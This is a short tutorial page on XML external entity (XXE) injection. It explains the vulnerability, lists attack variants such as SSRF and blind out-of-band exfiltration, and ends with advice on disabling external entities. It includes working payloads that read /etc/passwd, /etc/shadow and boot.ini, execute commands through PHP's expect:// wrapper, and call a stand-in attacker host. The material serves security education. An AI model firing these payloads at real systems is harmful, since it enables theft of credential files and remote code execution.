XXE Attack

XXE Attack

What is XXE?

XML external entity injection (also known as XXE) is a web security vulnerability that allows an attacker to interfere with an application’s processing of XML data. It often allows an attacker to view files on the application server filesystem, and to interact with any back-end or external systems that the application itself can access.

In some situations, an attacker can escalate an XXE attack to compromise the underlying server or other back-end infrastructure, by leveraging the XXE vulnerability to perform server side request forgery (SSRF) attacks.

How do you perform XXE?

Accessing a local resource that may not return

<?xml version="1.0" encoding="ISO-8859-1"?>

<!DOCTYPE foo [

  <!ELEMENT foo ANY >

  <!ENTITY xxe SYSTEM "file:///dev/random" >]>

<foo>&xxe;</foo>

Remote Code Execution

If fortune is on our side, and the PHP “expect” module is loaded, we can get RCE. Let’s modify the payload

<?xml version="1.0" encoding="ISO-8859-1"?>

<!DOCTYPE foo

 [<!ELEMENT foo ANY >

  <!ENTITY xxe SYSTEM "expect://id" >]>

<creds>

 <user>`&xxe;`</user>

 <pass>`mypass`</pass>

</creds>

Disclosing /etc/passwd or other targeted files

<?xml version="1.0" encoding="ISO-8859-1"?>

<!DOCTYPE foo [

 <!ELEMENT foo ANY >

 <!ENTITY xxe SYSTEM "file:///etc/passwd" >]>

<foo>&xxe;</foo>

<?xml version="1.0" encoding="ISO-8859-1"?>

<!DOCTYPE foo [

  <!ELEMENT foo ANY >

  <!ENTITY xxe SYSTEM "file:///etc/shadow" >]>

<foo>&xxe;</foo>

<?xml version="1.0" encoding="ISO-8859-1"?>

<!DOCTYPE foo [

 <!ELEMENT foo ANY >

 <!ENTITY xxe SYSTEM "file:///c:/boot.ini" >]>

<foo>&xxe;</foo>

<?xml version="1.0" encoding="ISO-8859-1"?>

<!DOCTYPE foo [

 <!ELEMENT foo ANY >

  <!ENTITY xxe SYSTEM "http://www.attacker.com/text.txt" >]>

<foo>&xxe;</foo>

What are the different types of attacks you can perform through XXE?

• Exploiting XXE to retrieve files,  where an external entity is defined containing the contents of a file, and returned in the application's response.
• Exploiting XXE to perform SSRF attacks, where an external entity is defined based on a URL to a back-end system.
• Exploiting blind XXE exfiltrate data out-of-band, where sensitive data is transmitted from the application server to a system that the attacker controls.
• Exploiting blind XXE to retrieve data via error messages, where the attacker can trigger a parsing error message containing sensitive data.

How can you mitigate this?

Virtually all XXE vulnerabilities arise because the application's XML parsing library supports potentially dangerous XML features that the application does not need or intend to use. The easiest and most effective way to prevent XXE attacks is to disable those features.

Generally, it is sufficient to disable resolution of external entities and disable support for XInclude. This can usually be done via configuration options or by programmatically overriding default behavior. Consult the documentation for your XML parsing library or API for details about how to disable unnecessary capabilities.

Reference:

https://portswigger.net/web-security/xxe

https://www.acunetix.com/blog/articles/xml-external-entity-xxe-vulnerabilities/